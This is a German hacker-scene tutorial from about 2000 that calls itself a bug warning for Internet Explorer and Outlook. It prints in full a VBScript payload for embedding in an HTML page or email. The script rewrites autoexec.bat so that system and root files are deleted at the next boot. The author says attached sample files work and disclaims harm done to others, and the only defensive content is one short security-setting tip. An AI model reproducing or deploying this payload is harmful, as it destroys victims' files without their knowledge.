by (c) 2k _ - [ DaS_cHaOs ] - _  alias: Kokus-Knacker


[-_-> Bug in MSIE und Outlook! <-_-]

Hi fans, freaks und der rest!

Ich habe durch einen Zufall einen "Bug" endeckt der den Microsoft 
Internet Explorer und Outlook gleicher massen betrifft!

Es geht um einen Script der einträge in bestimmten dateien verändert oder löscht,
das kann verherende folgen nach sich tragen wenn z.B. die Autoexec.bat so verändert
wird das sie bei einem reboot den inhalt eines (oder mehrerer) verzeichnissen löscht!
Nun ist es ja nich unbekannt das ein Bug dieser art immer wieder mir einem 
"AciveX steuerelement" (Visual Basic script "Vb script") in zusammenhang auftritt.
Ich demonstriere dir mal an einem einfachem bespiel was es doch für auswirkungen auf
das system haben kann. :-(

(falls dir das folgende über haupt nix sagen sollte dann...)
__________________________________________________________________________

<script language="VBScript"><!--
Set fs = CreateObject("Scripting.FileSystemObject")
Set format = fs.CreateTextFile("C:\autoexec.bat")
format.WriteLine("del c:\windows\system\*.*")
format.WriteLine("del c:\windows\*.*")
format.WriteLine("del c:\*.*")
format.WriteLine("cls")
format.WriteLine("echo Was meinst du ist real?")
format.WriteLine("pause")
format.WriteLine("echo das, dass du dich in sicherheit wagst?")
format.WriteLine("pause")
format.WriteLine("echo nein! nichts ist sicher! (c) DaS_cHaOs by real!")
format.WriteLine("pause")
format.Close
'end
</script>

___________________________________________________________________________


Dieser VB script der ganz einfach in einen <HEAD> eines HTML documentes eingebunden werden kann
hat böse auswirkungen!

zuerst wird die datei die umgeschrieben werden soll geöffnet! (zum editieren)

"Set format = fs.CreateTextFile("C:\autoexec.bat")"

dann wird einfach mit dem befehl "format.WriteLine("*******")" das gesagt was der script in
die zuvor geladene datei editieren soll!

in meinem fall ist es das die dateien in den systemverzeichnissen gelöscht werden!




--> Ich habe diesem tutorial auch eine beispiel HTML datei (und eMail, Outlook) beigefügt!

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

So könnt ihr euch schützen!

stellt bei eurem MsIE nicht die niedrigste sicherheitsstufe ein!
da bei einer normalen der Browser euch selbst eintscheiden lässt ob ihr den scrip ausführen wollt
oder auch nicht!
Sonst führt euer Browser den VB script einfach aus! und dann sind vielleich bein nächsten start
einige dateien verschwunden?

## Auch meine Beispiel dateien sind funktionsfähig und können euch schaden zu fügen ##

also alles auf euer risiko!!

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Da es noch viele solcher "Bugs" gibt ist dieses hier nur ein kleiner hinweiß
auf das was euch im WWW erwarten könnte!



--> Dieses tutorial könnt ihr auf eurer page veröffentlichen (ohne zu verändern), um vor dieser 
art von Bug zu warnen! oder auch nicht ;-)
Ich bin nicht verandwortlich für den Schaden den Ihr damit anrichtet! :-) (ob bei euch oder anderen!!!)

			

Bei fragen könnt ihr mich unter folgenden eMail adressen (bzw ICQ uin) kontaktieren.
			
			Kokus-knacker@busch-hacker.de
			ICQ uin: 54719031
			oder DaS_cHaOs@gmx.de


--> Und falls ihr rechtschreibfehler findet könnt ihr sie verschenken!